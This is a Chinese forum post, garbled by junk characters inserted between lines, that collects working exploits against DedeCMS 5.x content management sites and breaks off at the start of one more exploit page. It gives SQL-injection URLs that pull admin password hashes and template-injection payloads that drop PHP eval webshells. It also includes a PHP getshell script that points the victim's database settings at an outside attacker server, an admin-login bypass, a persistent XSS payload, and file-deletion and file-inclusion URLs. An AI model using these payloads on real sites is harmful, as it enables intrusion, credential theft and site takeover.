|
|
r) e+ O! I p& y+ s9 m) hDedecms 5.6 rss注入漏洞2 h5 B T0 F1 s( n8 B
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=11 d# z' u1 k, g8 H
, i" {' ^/ r- l" }4 V- M
: r @/ d1 r* q, N
; g% y: R5 s' {7 L
' A! d! M- m, r! C: J% @5 g
; o& j$ F' [1 M& B+ X8 x! c
/ t. W" J9 l; P" T+ @3 ?/ E T* X5 i0 p- ]2 ~2 {9 e2 {, T
' {; E8 B0 f8 K/ c lDedeCms v5.6 嵌入恶意代码执行漏洞3 o$ P- y! C6 `% C! |3 a7 }
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}& W9 `7 O+ h/ B6 Z1 x# H
发表后查看或修改即可执行# N( Y9 r" k( Q! w: _: x/ R
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}& g1 s% t3 y! F5 v" [, f
生成x.php 密码xiao,直接生成一句话。: [3 t$ V1 i1 }. E! l. f" C- i
! D. w7 w0 j! G$ v
- \3 [- q. g% X: Z8 j/ u# @( V4 S% D! H* f A
5 u8 p: Z& F) U9 E' A4 `8 P+ P8 k/ u' A4 E
, D6 I+ ~+ {3 q
0 y/ n# j: L/ T+ I- u* U4 J% r. k
; X, `* P B4 L( a' W z7 O, [% hDede 5.6 GBK SQL注入漏洞0 g0 d7 a1 \- M6 C+ I$ J" Y) c
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';( h% m4 z e( C" y* K* }$ ~+ j- s6 `: P
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
4 [- K5 O: d( Ahttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
- G# s0 p# [" I/ L2 Q7 l# g/ U% c' [
& u, e F8 L0 U5 _8 t9 T, Y
* A3 @0 R6 Y6 ^5 [5 J
+ F2 Z5 E# v$ O# u
- ?, F. m N* C7 X' s5 r5 V( O+ w( J9 Z% [) v: W
r7 f! l# P3 H8 Z' ]/ }
- ~* v) H% P t c2 \, Z5 B, ]DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞" b9 ?5 _9 `, T" J( g& D4 [8 A
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
* ^" O1 |+ @, o( O9 X: ]4 q G# }2 L; P* L
6 v* K) @/ s7 ?3 ~1 {, t* N4 K/ V- D, R
) \/ Y8 L3 Y" H: a5 A" Y
7 T* Q {0 a* z* A7 Z1 J# t/ M5 V! b+ }: d; V* p8 J# u1 a
DEDECMS 全版本 gotopage变量XSS漏洞
) i+ i5 K2 W* w$ ~* c1 l4 l1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
1 }: x9 O4 l5 }% K& J! i) r* ehttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
! K6 p$ F$ C! f- ?' m. t8 @% M/ U7 O" `$ k: @8 L
, ?6 |( G. h, ~! Q1 D2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 5 b( N5 t" ^" h7 Y; i7 j# p
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
* R0 _3 t" {8 b: Z& W7 U! d0 y4 ~9 z4 X' Q8 B* t( G
( L% u% k6 q; g- A$ p' i& rhttp://v57.demo.dedecms.com/dede/login.php
8 E( |9 L, }; t2 |0 S
7 [" s* t0 j& J! p4 g& v" `
5 L; J% q O, S9 m& ^# Ecolor=Red]DeDeCMS(织梦)变量覆盖getshell
) y( w( L" {* o7 z6 m" m7 E#!usr/bin/php -w! g/ b' u1 P0 T6 x8 R9 T
<?php
# P. f3 ^$ m" Oerror_reporting(E_ERROR);
& l+ D9 l! H- n" T# xset_time_limit(0);
8 v+ c" G8 C y; y2 k' yprint_r('' [/ ~/ ]0 ?" E0 s2 @7 `
DEDEcms Variable Coverage
& i9 y! e! I8 @; j) Y* VExploit Author: www.heixiaozi.comwww.webvul.com
. ~( W7 M0 c; |9 `);
6 H, T; P, v; ~8 f( C1 Uecho "\r\n";' w1 D: u) o2 i
if($argv[2]==null){
* A: h$ ?! t: X; S0 t) aprint_r('5 O6 F4 F# E7 ?" W. d
+---------------------------------------------------------------------------+
' R% }; |! I! n+ kUsage: php '.$argv[0].' url aid path8 Y* a, m1 X) \( E
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
' \# {7 @- y0 E7 Y3 s, fExample:" @! m2 T) ~# @: T4 L) s
php '.$argv[0].' www.site.com 1 old
# x" }1 E- ]0 m% _- y+---------------------------------------------------------------------------+
3 F s, B" z. P% L+ u" A');* J$ h! K3 D$ K$ w' O# R8 [, o
exit;
' B8 T/ C S z: ?3 r}- a, z7 `$ ?" s' X- e
$url=$argv[1];' O' g& S( k- m+ Z8 C7 B g1 {# u
$aid=$argv[2];! @: F4 h* S) }( Y3 _" o% R
$path=$argv[3];
2 u. u$ c, e! o7 f$exp=Getshell($url,$aid,$path);# u j" k" O* R3 J2 h
if (strpos($exp,"OK")>12){
1 q1 m+ o# z! Y, d1 O1 ^/ @$ pecho "
" Y) a+ J2 `& J8 Q5 b& GExploit Success \n";4 i4 Q' F% j- s) E& z
if($aid==1)echo "* A9 C: Q7 Q) ]6 j2 v
Shell:".$url."/$path/data/cache/fuck.php\n" ;( A g$ |( n: H% T5 ]
. B+ e# `( D U
4 d {# X7 k, m+ d6 Lif($aid==2)echo "
* O1 S0 Z a) Y6 w" `Shell:".$url."/$path/fuck.php\n" ;
, g% j) `/ Y( V/ ]
, N: A7 h$ \7 a' d' C7 E5 S9 |! Q
3 }5 a' U! w5 ^2 U4 K- gif($aid==3)echo "' p8 I2 \, X7 Z
Shell:".$url."/$path/plus/fuck.php\n";0 c$ a. a3 P4 C- y
. V6 q# a5 c7 z1 X, W. r# j9 g, }1 k/ Q/ A5 B
}else{
5 R# L/ ?, j% K% y; @- F9 O9 pecho "9 ^" e' u2 j1 {9 Q# V3 j
Exploit Failed \n";7 {3 h: L7 E& g" j5 C9 s4 B
}2 @: ~: `; v, J) @ F% X/ I) i; s
function Getshell($url,$aid,$path){
0 g4 ~ G3 C* g+ T$id=$aid;
& n( n, G5 K: `8 ?: ^$host=$url;, E- g5 b$ y+ P9 g1 g% E: i
$port="80";
0 h* l ~# w9 ]) y. n3 ~! m$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";% ^8 P, E9 C% X$ |8 C* q
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";% E: l' Q' m1 I! A" Q6 V
$data .= "Host: ".$host."\r\n";
4 @/ [% E, b2 Z. P$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
4 ]( p( ^4 |/ \$ |4 V$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";8 I; k. V# y/ _, U
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
; |- v& T/ {6 R& C/ ~, j" e5 w//$data .= "Accept-Encoding: gzip,deflate\r\n";
' ~( a, Q- s. }! I P4 z' V" D$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";' f9 `/ @8 o( w! W
$data .= "Connection: keep-alive\r\n";
# L y; Y7 u' B4 `$data .= "Content-Type: application/x-www-form-urlencoded\r\n";4 ?2 S. k% Y P/ u
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";2 V/ w" U \% [7 `$ A+ o
$data .= $content."\r\n";
! W* h% {" b$ k$ n. k$ `$ m$ock=fsockopen($host,$port);
( i' H& \9 M4 {* }if (!$ock) {/ Q) W$ G9 K5 h( H" U; U
echo "
3 c: H* F+ v" m8 Q+ NNo response from ".$host."\n";
' X' w6 |6 V8 s1 a}: _/ |$ _3 s, L4 o: x
fwrite($ock,$data);
. G' }) @5 l2 Z+ o: [. {while (!feof($ock)) {
; C; ^0 W8 X Q) K9 h& x$exp=fgets($ock, 1024);8 z; U7 _ f1 Y# V7 ^2 ^0 n
return $exp;
* w6 h, N5 D) I2 S+ C! W}3 j: q& V* E+ h0 m8 L. p
}
! f: g% `5 T& |: |) l% Z# Q* v: y% x! d1 g E
8 D: n9 J5 ]4 [8 X- c- k; |?>! F8 ?$ g+ c. t( J* e* t m; g- ?
4 {3 A( d# H$ M2 S) e+ U
! u2 N5 |2 K l1 `- v( S8 b& H3 w6 Y/ r5 `: P8 b( X! z
, J% Z3 e: ^* V( R5 ~
% G1 g- | J9 u2 V" m
% j8 ?: t, O8 Z9 {9 f5 a' v( V# b; q1 N: ]7 K. X8 T% O7 D
8 D. H; `5 M5 m, S N2 N
0 @ u3 ?4 X. }' v8 ~+ o7 Y/ `/ {4 O! C, S9 A' d
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)2 ], `! l1 [! V! x; ]1 n
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
5 h4 K! c8 [5 K3 V: j
# H" ?( r/ ~# h: H7 c! f2 Z- r
# i, X0 V2 c! L8 Y把上面validate=dcug改为当前的验证码,即可直接进入网站后台
( X$ D( W M6 }7 M O* d) m4 ~$ }# r" F8 j9 w$ T/ v
9 a% Z7 B! g \+ U! v此漏洞的前提是必须得到后台路径才能实现" K- \3 y& D! Z8 t- a) G% p+ w8 y$ G
/ D; F; S# ?# H* c
6 j2 K$ G/ W1 _: [7 d- O- n8 |% D( l
8 ^. _9 }; h2 |, k B
1 _: M0 g8 U: {5 w$ F3 `6 K2 @. s' l+ d' u+ R, e' M8 b
# a. I2 G, u7 K4 c/ V; w7 t
, y3 |2 u0 w$ z8 L! o" K& i# t& i4 }+ _! b6 [
" S% [6 I* e/ @8 ^1 lDedecms织梦 标签远程文件写入漏洞
% I; x: p( M# P7 G }4 U* [前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');. a! v0 s6 j+ M
& \ n; `2 }! [0 g8 R! j
$ q( ~ q a) `$ b$ W+ E5 D再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
q5 W5 `3 C: b- u, @' M) S# z# [<form action="" method="post" name="QuickSearch" id="QuickSearch">
' \# A0 g1 p D0 H# G- Y: P9 y<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />; s6 V5 @+ L4 G6 o8 x( b
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
# K/ o3 A9 o0 Z2 M<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />: L' Q- ?. }) G9 @+ C
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
& i, Q6 R/ Q _, e<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
& t, p* b" r+ v4 k* w<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
& ]; G8 `7 P: r+ ^7 g) A; U6 k<input type="text" value="true" name="nocache" style="width:400">
. j! ~, W, p( a' `! b5 X) R; E<input type="submit" value="提交" name="QuickSearchBtn"><br />8 {$ I/ Y4 G3 e; X: l* c
</form>
. e8 C! i- E, M5 x0 W7 \ }<script>4 F J% ~1 A0 T, J2 \7 [
function addaction()
8 x, r1 U. ^: g% e$ R{
0 t3 M8 i4 V1 Edocument.QuickSearch.action=document.QuickSearch.doaction.value;
2 m0 _0 F$ p3 d}, Z' } m: l- P# ]6 q' d) @
</script> l: g, B) ?0 i, X3 v- F6 Z
~& I7 h% l9 s: X9 a+ d d5 w: p A: `1 e# _3 H8 N; ]
7 F; z6 t& c3 m" n# f
# |- i1 t3 f( O1 |) Y
! N: o7 z$ I5 \0 `# v* _& Z
% M7 x% x7 z" @& ?% p/ ?1 {! L: n* _
% a) u, b& }- E9 C0 z
1 u7 x; x) s% a) w8 Y# P: t* |/ _& i g. L# {. w
1 P+ D5 i1 O( v5 X( p8 RDedeCms v5.6 嵌入恶意代码执行漏洞
^) l% \' {% v/ ]4 o7 H2 H注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行' p" Z! m: c+ z+ D
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}, `% V% U I$ s- C/ x, L
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得% f# G8 g; q+ F, ^1 R3 i
Dedecms <= V5.6 Final模板执行漏洞
' ~3 t$ G6 }- ^/ F( O) k* @: q注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
0 r* K% a1 j* N" Z3 ?uploads/userup/2/12OMX04-15A.jpg
2 E1 n7 I3 |/ f9 J
5 N4 \0 a# a; c+ U6 D* [9 ^; G& u# {* j
模板内容是(如果限制图片格式,加gif89a):, O0 M; x6 E9 L6 m; d6 ~" d
{dede:name runphp='yes'}
/ \5 X) l- b& L3 [& q6 `$fp = @fopen("1.php", 'a');
/ U, ~0 c! x$ Q" R. ?+ M: a3 |& F@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");% B; v2 Y: ?2 [/ A2 t% q
@fclose($fp);3 W* |$ a, t' A& \% s" w$ s
{/dede:name}2 n5 \9 e1 _+ ~7 w$ k, @
2 修改刚刚发表的文章,查看源文件,构造一个表单:
7 @. o# ]+ O3 @1 e' p: O<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">7 Y; e4 D0 U& e% O C8 Q2 P
<input type="hidden" name="dopost" value="save" />
1 t( G" |# p$ z; ~<input type="hidden" name="aid" value="2" /># w1 Z u4 J1 w5 N! _7 `( u% W" S
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />6 F; \; w4 m" _
<input type="hidden" name="channelid" value="1" /> Q" C f: g+ j2 l
<input type="hidden" name="oldlitpic" value="" />
/ a5 l9 Z+ j3 S( c. A' S<input type="hidden" name="sortrank" value="1275972263" />0 f4 b6 x- f" p$ g- U9 P* P+ p
. L1 s2 o3 d7 ?9 W% l" t" K
. G& X. Z! c3 Z<div id="mainCp"> `1 r( ~( P5 {+ r: }
<h3 class="meTitle"><strong>修改文章</strong></h3>) H; A6 n& @1 Z+ s" v+ l( _
+ r' e4 _1 X" X
7 a6 S. t" k# u" q, _! x<div class="postForm">! m$ a' d6 j. t1 f- I* \9 Y [* ~
<label>标题:</label>; S7 x( ]* [0 G; K( D/ s# m0 ~
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
2 F) @5 ^' T1 T+ g5 |0 ^: ^0 D# h+ t W. e
' f* }* T/ Z+ Z* E<label>标签TAG:</label>3 M _! u2 B2 J3 J" @9 Q4 d
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
! i: w0 ~2 \ O* S. {. }8 r% `6 }5 f- Q6 r: [
4 a7 M" m5 q" T8 q# d' t
<label>作者:</label>+ |- }- ?& i- G& d0 ~' f7 ]
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>" t+ p6 a( u) k! \2 \% l
9 |0 V/ s; K. s
& ]! L B' o5 `9 z: L+ d
<label>隶属栏目:</label>
: O. n5 Y! d7 q, a( m: C+ N, A, O<select name='typeid' size='1'>
8 _! C6 \* r, e B<option value='1' class='option3' selected=''>测试栏目</option>
) \2 p- \' W }9 l9 Y</select> <span style="color:#F00">*</span>(不能选择带颜色的分类) I8 b0 Z) z) i m' Y0 P& [
2 b+ e. F6 q" Y- B4 h$ m: S
( h. S; o# c+ ~8 E! k2 M
<label>我的分类:</label>& b7 k9 x! I y& b8 T8 i
<select name='mtypesid' size='1'>* _; g7 n% R$ u, Y' I3 k: [
<option value='0' selected>请选择分类...</option>" s/ c+ ^+ \5 K2 F& D% k
<option value='1' class='option3' selected>hahahha</option>, ]9 g" b' \) C
</select>( G7 o7 a5 U( l% X" g
: o, e5 _2 u- m5 U2 h
) ~# Z* Z3 i6 X! a1 {
<label>信息摘要:</label>
& |) V7 q" O- T. m9 j: y<textarea name="description" id="description">1111111</textarea>
: }3 g# X0 z& {( a7 R(内容的简要说明)
) N7 {8 S- D4 Q }
. [, f) d B& b. {) v1 C/ E5 r& P5 }4 v$ x9 |
<label>缩略图:</label>
( f, V3 p( @2 A% [<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/># h' q2 D: { F8 W: x, C
4 O/ P3 b3 i8 d6 r
9 G5 ^5 \( m( [$ j) L<input type='text' name='templet'$ Z6 k) H9 i. k. J
value="../ uploads/userup/2/12OMX04-15A.jpg">9 ^, O- _. b, _. `5 F
<input type='text' name='dede_addonfields'8 l( ]/ I* A; D0 e. T6 F) @
value="templet,htmltext;">(这里构造); J7 V5 z, d& l0 J
</div>* @' N( U* M# u# P# c/ U
u) p2 }/ ?( C
1 A1 `4 ?3 P, p: O<!-- 表单操作区域 -->
& r# \- Y0 z, [# t<h3 class="meTitle">详细内容</h3>
5 n1 b% s! C: o3 I' w! F
: E( l6 O7 Z6 Z a5 U" I( S5 S& T# R# @3 Z
<div class="contentShow postForm">' W$ o: @" l& S v
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>5 H! h6 f! L) {% |; T9 t( R
3 y" l. s- T, \, `% C% L |- b+ \* C/ d" U5 j
<label>验证码:</label>- B9 D; O5 \1 H( [
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
4 {, H) n% o( q; _<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />; k! n/ q: V$ M. r2 k9 p. R9 E9 X7 r# ~
2 `- X2 ?/ C& Z f7 W
8 H; i0 P2 ^& h
<button class="button2" type="submit">提交</button>3 F& ^/ `% v/ Y. f
<button class="button2 ml10" type="reset">重置</button> q) H' b9 u( h+ n; P: c' T i
</div>: q6 d4 w5 v3 g' ~8 e S9 Z
4 k/ A$ n- N* g/ u- ~- t- ]
; A" C" a% i l8 M) h0 D1 {7 Y5 |</div>
: i+ O) u9 C3 |& s7 @0 }
" e( x. k; K7 J" Q2 O& \: K) ~- n2 Q1 h( j
</form>2 {3 l" f" R/ ]6 J2 ?/ S
% g7 g$ B0 R; }1 X. @, q
; w& y8 p) o, j% F* B# t; M提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
+ D9 @, B# x; Q7 S0 b假设刚刚修改的文章的aid为2,则我们只需要访问:. [ n# e4 u' X# r9 n! I0 R
http://127.0.0.1/dede/plus/view.php?aid=2# {1 L7 g# C& e$ s! B4 C: a2 E
即可以在plus目录下生成webshell:1.php
: L: Z Q2 J) t" r; W. A$ h; s$ F. h) N- ~& i7 f
# Y4 Q7 D3 E" D }1 c
+ H' n7 j/ t' o: I, O: O0 c- n3 B! g
$ Y: R7 q( T- i! F9 C
: f5 n$ v _! T8 W- ~, p8 O, ?* l+ t* x" r9 k
# u; a& C1 G; f! N7 U
% `, c7 Y# O' K3 \# n& j
/ h) {' Z/ q" \. Q+ z: f( @
! W K- ? p3 A/ a
9 c, q1 P; A. R: k* }) x) lDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
M0 j" ^2 p1 V, MGif89a{dede:field name='toby57' runphp='yes'}
8 K* d+ J; _, a1 kphpinfo();
x% i. t7 J6 T* `{/dede:field}
' X" N2 `' X& i+ u; U' y保存为1.gif
3 b; p5 B/ s' j<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
; k( ?% O/ @% O<input type="hidden" name="aid" value="7" /> ) B0 H- g" a+ ]9 a. S! R
<input type="hidden" name="mediatype" value="1" />
2 g% m" `4 D8 ~# H<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
) F6 v. [7 j" U0 ]+ z5 [3 [: Y& z<input type="hidden" name="dopost" value="save" /> " g. m/ ?% i$ w( n1 n/ a' o
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> 9 i( U2 Z8 y4 ~$ ]- H0 A5 K' H( o
<input name="addonfile" type="file" id="addonfile"/> . k- e0 ]% n* b
<button class="button2" type="submit" >更改</button> * o+ B8 \0 R) {4 c. M0 I6 H3 w
</form>
2 ~. B2 P, f- E _$ V2 A" s+ q5 V
; ~6 ], s7 }& F6 O' x构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
7 E$ j7 a; e8 A8 h' g发表文章,然后构造修改表单如下:
3 C/ N5 a3 U8 {; E" k, J
# |& Q5 k7 y( v: m9 f' F: o4 h7 k( Z8 T) N* F* h
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> * O, N: S5 X: \# O0 A8 o0 v7 P m
<input type="hidden" name="dopost" value="save" /> 5 j& m2 w: n: [+ C$ ~5 V* V& A
<input type="hidden" name="aid" value="2" /> + u5 `2 K" w* c' w3 g4 Z
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> 6 x- y- T C$ H" I1 t6 {9 h4 L
<input type="hidden" name="channelid" value="1" />
/ v+ T, a' Z+ n7 U8 u% t$ X8 [<input type="hidden" name="oldlitpic" value="" />
3 y: N% o ?- W$ f- A<input type="hidden" name="sortrank" value="1282049150" /> - f; Z9 }' g! C9 |- a5 _ S
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
4 D6 }/ b8 Y6 H( q' y8 d, @( x( N& [<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> 9 z$ `" l# a. M- E
<select name='typeid' size='1'> 8 H/ ]* s: v3 W" \ r
<option value='1' class='option3' selected=''>Test</option>
7 U$ M7 L J+ B4 \<select name='mtypesid' size='1'>
' _- z* i& h2 D4 @0 S<option value='0' selected>请选择分类...</option> " b1 |1 E6 D" U$ [
<option value='1' class='option3' selected>aa</option></select>
, }: X8 G3 b( _3 r: T/ a<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> . T9 q& g5 i3 \8 \
<input type='hidden' name='dede_addonfields' value="templet"> & ]7 U5 e8 o6 Z3 C
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
) ^. M1 [. z! P7 d h9 s<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> 9 v" T3 H% g9 y$ x. d/ |
<button class="button2" type="submit">提交</button> % H; p9 \2 U' o9 `( x: q0 F
</form>
# z8 g: `3 z3 v4 A! g- q2 k- j. v" Y" U' b
3 m9 ]2 H7 O" w. ^$ U+ ?& b
# E5 n n1 K o5 b' V7 b( U- |8 t' o* G# z; o
0 @0 m# I) @7 E
4 C* l* d. c1 s1 I/ L
+ Z! F. T$ W1 L4 s |% S- d! q8 }+ t T2 g8 y: y: R$ d9 C1 M
5 o: z6 g! W M4 ^/ G; w
# g: I6 j3 u# ?8 ?7 ~6 i! g1 [9 h! o) [/ ^
( i: N/ [; i) l, G织梦(Dedecms)V5.6 远程文件删除漏洞
+ A' u: \+ c' p# Z1 xhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif8 i/ a4 O6 O w! b# M
# g( D( g; _* e' _' n
|" j7 ?, s, f9 U( G a% s7 l
. q2 \! u6 r- v( q! Y4 N' q
A! ~, h; b7 d! I3 l% }
# b# h g: u8 f" m! L& z3 F" E. B$ D) H& C0 \ \; ^6 k
5 c# l3 F# l# z2 x, Q3 e! l; O' w( z: l' ^3 H ?/ _
: k2 }4 r: e2 A# [7 V: }6 i0 J
p. D7 b+ u, c# O织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 / E( Z2 C& G, y/ x5 @& u
http://www.test.com/plus/carbuya ... urn&code=../../' Q+ y$ h" [ q" ^, q
2 I. O0 N: |, J2 P/ S5 K
) X E& j1 m! e0 r! t
6 o7 E# e/ Z( l& C3 s$ H! w
; f9 F' k% P- y, z! ]0 \6 \; q1 M8 r# O# X) E0 V6 p
$ _8 ~1 _! [: m) J8 L/ o- H
& G, k- k( k& P; H$ L' Q
% U6 G! N, B: J& H$ F
# f5 o6 U; J8 C9 @" C9 X$ Z
" f" p" m ]4 v+ ]DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
1 Z1 }) [' V0 u3 Dplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
; {# J6 n+ q0 r5 n; u8 y密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
- u& I$ {/ i4 Y
4 Y7 Q9 e+ F( m+ W, \: v ?$ l
: ~5 p- f5 O1 C9 `9 S- U. ?
& {# B/ g+ O4 b) ~6 |" r1 r1 \8 w. f/ V
! J J8 b' v* K. j" u
8 |. L0 t, |' f m
' c0 N8 k+ r) p# C' }7 I5 ]$ q
3 }" K& S, ?0 B! @: M3 n6 v
% D z$ I. d6 l
- { Y9 n+ m# B7 k9 S织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
5 V3 @( O9 x. w; P* Y& F L) f. rhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='$ t2 q0 Q( o: {5 G# y. O* f
0 G+ D3 z7 A# m) j$ @- K
+ ]1 r) D+ f$ z0 {/ k) |$ ^4 b, Q4 R2 u9 H/ x8 D
3 D' `) {" C+ d, _
- h D! g* ]* b* k3 L9 E* `
# z% t$ O% c! c5 Q- D. ]' S9 c0 b3 ~" k$ C
, o$ [/ r& H! U: i
0 ?' a, P. K* ?+ z
7 ]9 l; }1 O) _1 T, P2 |
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞; q" W; l+ T9 X2 K
<html>1 a) }+ y$ L' {6 c7 T
<head>
0 v+ _* F* m+ v/ e$ T<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>+ H; M! O! R l6 l2 \
</head>) V* v5 g4 C7 b% x
<body style="FONT-SIZE: 9pt">' t4 s4 u% K, `! l( ]
